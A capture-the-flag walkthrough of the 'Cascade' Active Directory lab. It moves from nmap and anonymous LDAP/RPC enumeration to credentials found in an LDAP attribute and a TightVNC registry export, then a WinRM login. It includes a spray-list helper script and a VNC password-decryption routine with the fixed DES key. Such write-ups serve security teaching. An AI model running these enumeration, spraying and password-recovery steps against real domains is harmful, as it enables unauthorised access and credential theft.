1. Reconnaissance
1.1. nmap
Nothing exotic stands out in the nmap results, but the combination of DNS (53), Kerberos (88), LDAP (389/636) and the Global Catalog ports (3268/3269) means this is not merely a domain-joined host: it is the domain controller itself (CASC-DC1 for cascade.local, Windows Server 2008 R2). Two other details matter later: WinRM is listening on 5985, and SMB signing is enabled and required, so NTLM relay against this host is not an option. This is the default top-1000 port scan (985 filtered + 15 open); a full -p- sweep was not run.
┌──(root㉿kali)-[/home/kali/labs/Cascade/Cascade-2]
└─# nmap -sC -sV 10.129.42.135
Starting Nmap 7.95 ( https://nmap.org ) at 2025-12-21 19:23 +04
Nmap scan report for 10.129.42.135
Host is up (0.19s latency).
Not shown: 985 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-12-21 15:24:06Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49167/tcp open msrpc Microsoft Windows RPC
Service Info: Host: CASC-DC1; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-12-21T15:25:01
|_ start_date: 2025-12-21T10:58:53
| smb2-security-mode:
| 2:1:0:
|_ Message signing enabled and required
|_clock-skew: -1s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 112.44 seconds
1.2. rpcclient
The DC accepts a null session (-U "" -N), and enumdomusers lists the domain accounts. I saved these names, one per line, to a file called users. The RIDs are worth keeping too: CascGuest is RID 0x1f5 (501), the built-in Guest account renamed, and the rest run from 0x452 (1106) upward in roughly creation order, which is how the objectSid values seen later over LDAP can be matched back to this list.
┌──(root㉿kali)-[/home/kali/labs/Cascade/Cascade-2]
└─# rpcclient -U "" -N 10.129.42.135
rpcclient $> enumdomusers
user:[CascGuest] rid:[0x1f5]
user:[arksvc] rid:[0x452]
user:[s.smith] rid:[0x453]
user:[r.thompson] rid:[0x455]
user:[util] rid:[0x457]
user:[j.wakefield] rid:[0x45c]
user:[s.hickson] rid:[0x461]
user:[j.goodhand] rid:[0x462]
user:[a.turnbull] rid:[0x464]
user:[e.crowe] rid:[0x467]
user:[b.hanson] rid:[0x468]
user:[d.burman] rid:[0x469]
user:[BackupSvc] rid:[0x46a]
user:[j.allen] rid:[0x46e]
user:[i.croft] rid:[0x46f]
rpcclient $>
1.3. Recon that led nowhere
Listing anonymously accessible shares with smbmap and smbclient turned up nothing: smbmap reports access denied, and smbclient's anonymous login succeeds but returns an empty share list.
┌──(root㉿kali)-[/home/kali/labs/Cascade/Cascade-2]
└─# smbmap -H 10.129.42.135
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.7 | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 1 authenticated session(s)
[!] Access denied on 10.129.42.135, no fun for you...
[*] Closed 1 connections
┌──(root㉿kali)-[/home/kali/labs/Cascade/Cascade-2]
└─# smbclient -N -L //10.129.42.135
Anonymous login successful
Sharename Type Comment
--------- ---- -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.42.135 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
1.4. Conclusion
All we have at this point is the domain name and a list of account names. As in earlier labs, the next steps are to look for accounts with Kerberos pre-authentication disabled using impacket-GetNPUsers, and to test SMB logons with each username as its own password.
2. Initial access
2.1. Failed: impacket-GetNPUsers
This was the first thing tried, but no account has pre-authentication disabled, so there is nothing to AS-REP roast. The output is still informative, because the KDC answers differently depending on account state: KDC_ERR_CLIENT_REVOKED means the principal exists but is disabled, locked out or expired, and KDC_ERR_C_PRINCIPAL_UNKNOWN means there is no such principal. The error lines never name the account, so they have to be read in the order of the users file. Matched that way, the three revoked entries below are CascGuest, e.crowe and i.croft, and the two unknown principals are "b" and "hanson": b.hanson was saved as two lines when the list was written out, so that account was never actually tested here (nor in the spray that follows).
┌──(root㉿kali)-[/home/kali/labs/Cascade/Cascade-2]
└─# impacket-GetNPUsers 'CASCADE.LOCAL/' -usersfile users -outputfile hash -dc-ip 10.129.42.135
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User arksvc doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User s.smith doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User r.thompson doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User util doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User j.wakefield doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User s.hickson doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User j.goodhand doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User a.turnbull doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] User d.burman doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User BackupSvc doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User j.allen doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
2.2. Failed: username-as-password check over SMB with nxc
I checked whether any account uses its own name as its password; none does. Two things about this command are worth noting. Without --no-bruteforce, nxc tries every user in the file against every password in the file (the arksvc:CascGuest line shows it), which is a full cross-product spray against a lockout policy we have not yet read, not the one-to-one check that was intended. And the separate b and hanson entries show that b.hanson was saved as two lines in the users file, so that account was never tested.
┌──(root㉿kali)-[/home/kali/labs/Cascade/Cascade-2]
└─# nxc smb 10.129.42.135 -u users -p users --continue-on-success
SMB 10.129.42.135 445 CASC-DC1 [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:CASC-DC1) (domain:cascade.local) (signing:True) (SMBv1:False)
SMB 10.129.42.135 445 CASC-DC1 [-] cascade.local\CascGuest:CascGuest STATUS_LOGON_FAILURE
SMB 10.129.42.135 445 CASC-DC1 [-] cascade.local\arksvc:CascGuest STATUS_LOGON_FAILURE
SMB 10.129.42.135 445 CASC-DC1 [-] cascade.local\s.smith:CascGuest STATUS_LOGON_FAILURE
SMB 10.129.42.135 445 CASC-DC1 [-] cascade.local\r.thompson:CascGuest STATUS_LOGON_FAILURE
SMB 10.129.42.135 445 CASC-DC1 [-] cascade.local\util:CascGuest STATUS_LOGON_FAILURE
SMB 10.129.42.135 445 CASC-DC1 [-] cascade.local\j.wakefield:CascGuest STATUS_LOGON_FAILURE
SMB 10.129.42.135 445 CASC-DC1 [-] cascade.local\s.hickson:CascGuest STATUS_LOGON_FAILURE
SMB 10.129.42.135 445 CASC-DC1 [-] cascade.local\j.goodhand:CascGuest STATUS_LOGON_FAILURE
SMB 10.129.42.135 445 CASC-DC1 [-] cascade.local\a.turnbull:CascGuest STATUS_LOGON_FAILURE
SMB 10.129.42.135 445 CASC-DC1 [-] cascade.local\e.crowe:CascGuest STATUS_LOGON_FAILURE
SMB 10.129.42.135 445 CASC-DC1 [-] cascade.local\b:CascGuest STATUS_LOGON_FAILURE
SMB 10.129.42.135 445 CASC-DC1 [-] cascade.local\hanson:CascGuest STATUS_LOGON_FAILURE
[...SNIP...]
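The error lines above carry more than they seem to: the KDC distinguishes a disabled or locked account (KDC_ERR_CLIENT_REVOKED) from a non-existent one (KDC_ERR_C_PRINCIPAL_UNKNOWN), but it never names the principal, so the only way to attach a state to an account is to walk the output in the same order as the users file and use the named lines as sync points. The Python below is an added example, not part of the original write-up: it re-reads the GetNPUsers output above against a constructed copy of the users file as it was actually saved (with b.hanson split into "b" and "hanson", which is what the nxc output shows), labels every account, flags the split name, and produces a spray list that leaves out accounts that would only generate lockout noise. The $krb5asrep$ handling, the helper names and the split-name heuristic are mine.

```python
"""Re-read impacket-GetNPUsers output against the users file it was fed.

Added example, not part of the original write-up. USERS is a constructed copy
of the users file as it was actually saved (b.hanson ended up as two lines,
"b" and "hanson"); OUTPUT is the GetNPUsers output shown above.
"""
import re

USERS = ["CascGuest", "arksvc", "s.smith", "r.thompson", "util", "j.wakefield",
         "s.hickson", "j.goodhand", "a.turnbull", "e.crowe", "b", "hanson",
         "d.burman", "BackupSvc", "j.allen", "i.croft"]

REVOKED = "[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)"
UNKNOWN = "[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)"
NOPREAUTH = "[-] User %s doesn't have UF_DONT_REQUIRE_PREAUTH set"
OUTPUT = "\n".join(
    ["Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies", "", REVOKED]
    + [NOPREAUTH % u for u in ("arksvc", "s.smith", "r.thompson", "util", "j.wakefield",
                               "s.hickson", "j.goodhand", "a.turnbull")]
    + [REVOKED, UNKNOWN, UNKNOWN]
    + [NOPREAUTH % u for u in ("d.burman", "BackupSvc", "j.allen")]
    + [REVOKED])

# What each KDC error says about the account. The KDC never names the principal,
# so the position of the line in the output is the only link to the users file.
KDC_STATES = {
    "KDC_ERR_CLIENT_REVOKED": "revoked",       # exists, but disabled, locked out or expired
    "KDC_ERR_C_PRINCIPAL_UNKNOWN": "unknown",  # no principal by that name in the realm
}


def classify(users, output):
    """Walk the output in users-file order and label every account."""
    result = {"preauth_required": [], "roastable": [], "revoked": [], "unknown": [], "other": []}
    remaining = iter(users)
    for line in output.splitlines():
        m = re.match(r"\[-\] User (\S+) doesn't have UF_DONT_REQUIRE_PREAUTH set", line)
        if m:
            expected = next(remaining)
            if m.group(1) != expected:  # named lines let us notice when we have lost sync
                raise ValueError(f"out of step: output says {m.group(1)!r}, file says {expected!r}")
            result["preauth_required"].append(expected)
            continue
        if line.startswith("$krb5asrep$"):  # AS-REP hash printed for an account without pre-auth
            result["roastable"].append(next(remaining))
            continue
        m = re.search(r"Kerberos SessionError: (KDC_ERR_\w+)", line)
        if m:
            result[KDC_STATES.get(m.group(1), "other")].append(next(remaining))
    leftover = list(remaining)
    if leftover:
        raise ValueError(f"no output line for {leftover}")
    return result


def suspect_split_names(users):
    """A lone letter followed by a bare surname is usually one first.last entry broken in two."""
    return [(a, b, f"{a}.{b}") for a, b in zip(users, users[1:])
            if re.fullmatch(r"[a-z]", a) and re.fullmatch(r"[a-z]{2,}", b)]


def spray_candidates(result):
    """Accounts that exist and can authenticate; revoked and unknown ones only add lockout noise."""
    return sorted(result["preauth_required"] + result["roastable"], key=str.lower)


if __name__ == "__main__":
    labels = classify(USERS, OUTPUT)
    for state, names in labels.items():
        print(f"{state:17s} {', '.join(names)}")
    for a, b, fixed in suspect_split_names(USERS):
        print(f"users file has {a!r} and {b!r} on separate lines: probably {fixed}, never tested")
    print("spray list:", " ".join(spray_candidates(labels)))
```

The name check on the "doesn't have UF_DONT_REQUIRE_PREAUTH" lines is what makes the positional reading safe: if a line is ever missing or duplicated, the next named line no longer matches the expected entry and the script stops rather than silently mislabelling accounts.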
2.3. Information gathering with ldapsearch
This module introduces ldapsearch; background on the tool is covered on its own page.
2.3.1. Basic information gathering with ldapsearch
The first query is an anonymous simple bind (-x, no -D) doing a base-scope search against the RootDSE (empty base DN) for namingContexts. This needs no credentials on any DC and tells us which directory partitions the server holds.
┌──(root㉿kali)-[/home/kali/labs/Cascade/Cascade-2]
└─# ldapsearch -x -H ldap://10.129.42.135 -s base -b "" namingcontexts
# extended LDIF
#
# LDAPv3
# base <> with scope baseObject
# filter: (objectclass=*)
# requesting: namingcontexts
#
#
dn:
namingContexts: DC=cascade,DC=local
namingContexts: CN=Configuration,DC=cascade,DC=local
namingContexts: CN=Schema,CN=Configuration,DC=cascade,DC=local
namingContexts: DC=DomainDnsZones,DC=cascade,DC=local
namingContexts: DC=ForestDnsZones,DC=cascade,DC=local
# search result
search: 2
result: 0 Success
# numResponses: 2
# numEntries: 1
The DC=cascade,DC=local partition holds the domain objects, and the DC lets the same anonymous bind read it in full. That is a finding in itself: every user object, group membership and account flag is exposed without credentials. Within Ryan Thompson's entry a non-standard attribute, cascadeLegacyPwd, stands out, and its value looks like base64. The same entry also gives the logon name directly (sAMAccountName: r.thompson) and a userAccountControl of 66048 (0x10200: NORMAL_ACCOUNT plus DONT_EXPIRE_PASSWORD), which is consistent with the GetNPUsers result, since the DONT_REQ_PREAUTH bit (0x400000) is not set.
┌──(root㉿kali)-[/home/kali/labs/Cascade/Cascade-2]
└─# ldapsearch -x -H ldap://10.129.42.135 -b "DC=cascade,DC=local"
# extended LDIF
#
# LDAPv3
# base <DC=cascade,DC=local> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#
# cascade.local
dn: DC=cascade,DC=local
objectClass: top
objectClass: domain
objectClass: domainDNS
distinguishedName: DC=cascade,DC=local
instanceType: 5
whenCreated: 20200109153132.0Z
whenChanged: 20251221105843.0Z
[...SNIP...]
# Ryan Thompson, Users, UK, cascade.local
dn: CN=Ryan Thompson,OU=Users,OU=UK,DC=cascade,DC=local
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: Ryan Thompson
sn: Thompson
givenName: Ryan
distinguishedName: CN=Ryan Thompson,OU=Users,OU=UK,DC=cascade,DC=local
instanceType: 4
whenCreated: 20200109193126.0Z
whenChanged: 20200323112031.0Z
displayName: Ryan Thompson
uSNCreated: 24610
memberOf: CN=IT,OU=Groups,OU=UK,DC=cascade,DC=local
uSNChanged: 295010
name: Ryan Thompson
objectGUID:: LfpD6qngUkupEy9bFXBBjA==
userAccountControl: 66048
badPwdCount: 19
codePage: 0
countryCode: 0
badPasswordTime: 134108054347592772
lastLogoff: 0
lastLogon: 132247339125713230
pwdLastSet: 132230718862636251
primaryGroupID: 513
objectSid:: AQUAAAAAAAUVAAAAMvuhxgsd8Uf1yHJFVQQAAA==
accountExpires: 9223372036854775807
logonCount: 2
sAMAccountName: r.thompson
sAMAccountType: 805306368
userPrincipalName: r.thompson@cascade.local
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=cascade,DC=local
dSCorePropagationData: 20200126183918.0Z
dSCorePropagationData: 20200119174753.0Z
dSCorePropagationData: 20200119174719.0Z
dSCorePropagationData: 20200119174508.0Z
dSCorePropagationData: 16010101000000.0Z
lastLogonTimestamp: 132294360317419816
msDS-SupportedEncryptionTypes: 0
cascadeLegacyPwd: clk0bjVldmE=
[...SNIP...]
Base64-decoding the value gives the plaintext:
┌──(root㉿kali)-[/home/kali/labs/Cascade/Cascade-2]
└─# echo 'clk0bjVldmE=' | base64 -d
rY4n5eva
2.4. Identifying SMB shares
The LDAP entry gives the logon name directly (sAMAccountName: r.thompson), so the legacy password can be tested against that account straight away. nxc confirms the credential and lists the shares; of those readable to this user, Data is the interesting one.
┌──(root㉿kali)-[/home/kali/labs/Cascade/Cascade-2]
└─# nxc smb 10.129.42.135 -u r.thompson -p rY4n5eva --shares
SMB 10.129.42.135 445 CASC-DC1 [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:CASC-DC1) (domain:cascade.local) (signing:True) (SMBv1:False)
SMB 10.129.42.135 445 CASC-DC1 [+] cascade.local\r.thompson:rY4n5eva
SMB 10.129.42.135 445 CASC-DC1 [*] Enumerated shares
SMB 10.129.42.135 445 CASC-DC1 Share Permissions Remark
SMB 10.129.42.135 445 CASC-DC1 ----- ----------- ------
SMB 10.129.42.135 445 CASC-DC1 ADMIN$ Remote Admin
SMB 10.129.42.135 445 CASC-DC1 Audit$
SMB 10.129.42.135 445 CASC-DC1 C$ Default share
SMB 10.129.42.135 445 CASC-DC1 Data READ
SMB 10.129.42.135 445 CASC-DC1 IPC$ Remote IPC
SMB 10.129.42.135 445 CASC-DC1 NETLOGON READ Logon server share
SMB 10.129.42.135 445 CASC-DC1 print$ READ Printer Drivers
SMB 10.129.42.135 445 CASC-DC1 SYSVOL READ Logon server share
2.5. Contents of the Data share
The share is laid out by department, with per-user folders under IT\Temp; Contractors and Finance are not readable as r.thompson. Under IT\Temp\s.smith there is a single file, VNC Install.reg.
┌──(root㉿kali)-[/home/kali/labs/Cascade/Cascade-2]
└─# smbclient //10.129.42.135/Data -U r.thompson%rY4n5eva
Try "help" to get a list of possible commands.
smb: \> recurse ON
smb: \> ls
. D 0 Mon Jan 27 07:27:34 2020
.. D 0 Mon Jan 27 07:27:34 2020
Contractors D 0 Mon Jan 13 05:45:11 2020
Finance D 0 Mon Jan 13 05:45:06 2020
IT D 0 Tue Jan 28 22:04:51 2020
Production D 0 Mon Jan 13 05:45:18 2020
Temps D 0 Mon Jan 13 05:45:15 2020
\Contractors
NT_STATUS_ACCESS_DENIED listing \Contractors\*
\Finance
NT_STATUS_ACCESS_DENIED listing \Finance\*
\IT
. D 0 Tue Jan 28 22:04:51 2020
.. D 0 Tue Jan 28 22:04:51 2020
Email Archives D 0 Tue Jan 28 22:00:30 2020
LogonAudit D 0 Tue Jan 28 22:04:40 2020
Logs D 0 Wed Jan 29 04:53:04 2020
Temp D 0 Wed Jan 29 02:06:59 2020
[...SNIP...]
\IT\Temp\r.thompson
. D 0 Wed Jan 29 02:06:53 2020
.. D 0 Wed Jan 29 02:06:53 2020
\IT\Temp\s.smith
. D 0 Wed Jan 29 00:00:01 2020
.. D 0 Wed Jan 29 00:00:01 2020
VNC Install.reg A 2680 Tue Jan 28 23:27:44 2020
smb: \>
2.6. A closer look at VNC Install.reg
2.6.1. Analysing the registry file
VNC is a remote-desktop protocol. The TightVNC server keeps its access password in the registry so it does not have to be re-entered, but the stored value is not a hash: it is the password DES-encrypted under a fixed, publicly known key shared by the common VNC implementations, so anyone who can read the registry value (or, as here, an exported .reg file) can recover the plaintext. In the export below the value sits under Password as hex:6b,cf,2a,4b,6e,5a,ca,0f. Two other details are worth noting: the file is UTF-16LE, which is why cat prints two garbage characters (the byte-order mark) in front of the header, and AcceptRfbConnections=1 with LoopbackOnly=0 means the server accepted remote connections on RfbPort 0x170c (5900). The vncpwd entry covers the decryption tool.
┌──(root㉿kali)-[/home/kali/labs/Cascade/Cascade-2]
└─# cat VNC\ Install.reg
��Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC]
[HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC\Server]
"ExtraPorts"=""
"QueryTimeout"=dword:0000001e
"QueryAcceptOnTimeout"=dword:00000000
"LocalInputPriorityTimeout"=dword:00000003
"LocalInputPriority"=dword:00000000
"BlockRemoteInput"=dword:00000000
"BlockLocalInput"=dword:00000000
"IpAccessControl"=""
"RfbPort"=dword:0000170c
"HttpPort"=dword:000016a8
"DisconnectAction"=dword:00000000
"AcceptRfbConnections"=dword:00000001
"UseVncAuthentication"=dword:00000001
"UseControlAuthentication"=dword:00000000
"RepeatControlAuthentication"=dword:00000000
"LoopbackOnly"=dword:00000000
"AcceptHttpConnections"=dword:00000001
"LogLevel"=dword:00000000
"EnableFileTransfers"=dword:00000001
"RemoveWallpaper"=dword:00000001
"UseD3D"=dword:00000001
"UseMirrorDriver"=dword:00000001
"EnableUrlParams"=dword:00000001
"Password"=hex:6b,cf,2a,4b,6e,5a,ca,0f
"AlwaysShared"=dword:00000000
"NeverShared"=dword:00000000
"DisconnectClients"=dword:00000001
"PollingInterval"=dword:000003e8
"AllowLoopback"=dword:00000000
"VideoRecognitionInterval"=dword:00000bb8
"GrabTransparentWindows"=dword:00000001
"SaveLogToAllUsersPath"=dword:00000000
"RunControlInterface"=dword:00000001
"IdleTimeout"=dword:00000000
"VideoClasses"=""
"VideoRects"=""
2.6.2. Decrypting and extracting the password
vncpwd expects the raw ciphertext bytes, so the hex string is written out with xxd -r -p and the resulting file passed to the tool, which yields the plaintext.
┌──(root㉿kali)-[/home/kali/labs/Cascade/Cascade-2]
└─# echo '6bcf2a4b6e5aca0f' | xxd -r -p > vnc_enc_pass
┌──(root㉿kali)-[/home/…/labs/Cascade/Cascade-2/vncpwd]
└─# ./vncpwd ../vnc_enc_pass
Password: sT333ve2
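Doing the .reg handling by hand is error-prone: the export is UTF-16LE with a byte-order mark, regedit wraps long hex values with a trailing backslash, and dword values are written as hex. The Python below is an added example, not part of the write-up and not TightVNC's code: it decodes the file, parses the key/value lines into native types, writes the Password bytes to vnc_enc_pass (the same input vncpwd takes above, without the xxd step), lists the settings that matter for exposure, and derives the key that a standard DES tool needs. VNC's bundled d3des reads key bits in the opposite order from standard DES, so the fixed key 17 52 6b 06 23 4e 58 07 has to be fed to openssl with each byte bit-reversed, e84ad660c4721ae0. The sample bytes are a constructed, trimmed version of VNC Install.reg; the Password line is wrapped only to exercise the continuation handling, and the helper names and audit rules are mine.

```python
"""Parse a regedit export and recover TightVNC's stored server password bytes.

Added example, not from the write-up or from TightVNC. SAMPLE_REG is a
constructed, trimmed copy of "VNC Install.reg" encoded the way regedit writes
it: UTF-16LE with a byte-order mark and CRLF line endings.
"""
import re

SERVER_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC\Server"

SAMPLE_REG = b"\xff\xfe" + (
    "Windows Registry Editor Version 5.00\r\n\r\n"
    "[HKEY_LOCAL_MACHINE\\SOFTWARE\\TightVNC\\Server]\r\n"
    '"IpAccessControl"=""\r\n'
    '"RfbPort"=dword:0000170c\r\n'
    '"HttpPort"=dword:000016a8\r\n'
    '"AcceptRfbConnections"=dword:00000001\r\n'
    '"UseVncAuthentication"=dword:00000001\r\n'
    '"LoopbackOnly"=dword:00000000\r\n'
    '"AcceptHttpConnections"=dword:00000001\r\n'
    '"EnableFileTransfers"=dword:00000001\r\n'
    # regedit wraps long hex values with a trailing backslash; wrapped here to exercise that path
    '"Password"=hex:6b,cf,2a,4b,\\\r\n'
    "  6e,5a,ca,0f\r\n"
).encode("utf-16-le")


def load_reg(data):
    """Decode a .reg export: version 5.00 files are UTF-16 with a BOM, REGEDIT4 files were ANSI."""
    if data.startswith(b"\xff\xfe"):
        return data[2:].decode("utf-16-le")
    if data.startswith(b"\xfe\xff"):
        return data[2:].decode("utf-16-be")
    return data.decode("cp1252", errors="replace")


def parse_value(raw):
    """Convert one right-hand side into a Python value."""
    if raw.startswith('"') and raw.endswith('"'):
        return raw[1:-1].replace('\\"', '"').replace("\\\\", "\\")
    if raw.startswith("dword:"):
        return int(raw[len("dword:"):], 16)
    m = re.match(r"hex(?:\([0-9a-fA-F]+\))?:(.*)$", raw)  # plain hex: and typed hex(N):
    if m:
        return bytes(int(b, 16) for b in m.group(1).split(",") if b.strip())
    return raw  # e.g. "-" (delete marker); left as-is


def parse_reg(text):
    """Return {key_path: {value_name: value}}; continuation lines are joined first."""
    text = re.sub(r"\\\r?\n[ \t]*", "", text)  # a trailing backslash means the value continues
    reg, key = {}, None
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(";") or line.startswith("Windows Registry Editor") or line == "REGEDIT4":
            continue
        if line[0] == "[" and line[-1] == "]":
            key = line[1:-1]
            reg.setdefault(key, {})
            continue
        if key is None:
            raise ValueError("value before any [key] line")
        name, _, raw = line.partition("=")
        reg[key]["@" if name == "@" else name.strip('"')] = parse_value(raw)
    return reg


VNC_FIXED_KEY = bytes([0x17, 0x52, 0x6B, 0x06, 0x23, 0x4E, 0x58, 0x07])


def vnc_des_key():
    """Key for standard DES tools: VNC's d3des consumes each key byte with its bits reversed."""
    return bytes(int(f"{b:08b}"[::-1], 2) for b in VNC_FIXED_KEY)


def audit(server):
    """Exposure notes drawn from the Server key values (rules are mine, not TightVNC's)."""
    notes = []
    pw = server.get("Password")
    if isinstance(pw, bytes) and pw:
        notes.append(f"stored password {pw.hex()} ({len(pw)} bytes, DES under the fixed VNC key)")
    if server.get("AcceptRfbConnections") == 1 and not server.get("LoopbackOnly"):
        notes.append(f"RFB listener reachable from the network on tcp/{server.get('RfbPort', 5900)}")
    if server.get("AcceptHttpConnections") == 1:
        notes.append(f"HTTP viewer listener on tcp/{server.get('HttpPort', 5800)}")
    if server.get("EnableFileTransfers") == 1:
        notes.append("file transfers enabled: a VNC logon also gives file access on the host")
    if not server.get("IpAccessControl"):
        notes.append("no IpAccessControl rules, any source address may connect")
    return notes


if __name__ == "__main__":
    server = parse_reg(load_reg(SAMPLE_REG))[SERVER_KEY]
    with open("vnc_enc_pass", "wb") as f:  # the raw-bytes file vncpwd takes above
        f.write(server["Password"])
    for note in audit(server):
        print("-", note)
    print("DES key for standard tools:", vnc_des_key().hex())
```

With the file written, the vncpwd step above is unchanged. To decrypt without vncpwd, the same bytes go through single DES in CBC mode with a zero IV and the bit-reversed key: openssl enc -d -des-cbc -nopad -K e84ad660c4721ae0 -iv 0000000000000000 -in vnc_enc_pass (on OpenSSL 3, single DES lives in the legacy provider, so add -provider legacy -provider default).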
2.7. Getting user.txt
The file came from s.smith's folder, so the obvious test is whether the VNC password is also that account's domain password. It is: evil-winrm over the WinRM port found in the scan (5985) logs in as s.smith and the flag is readable. Password reuse between a local tool and the domain account is the whole foothold here.
┌──(root㉿kali)-[/home/…/labs/Cascade/Cascade-2/vncpwd]
└─# evil-winrm -i 10.129.42.135 -u s.smith -p sT333ve2
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\s.smith\Documents> type ../Desktop/user.txt
3. Privilege escalation
This work is being done on an Apple Silicon MacBook, and I cannot set up a Windows environment at the moment, so this part is skipped.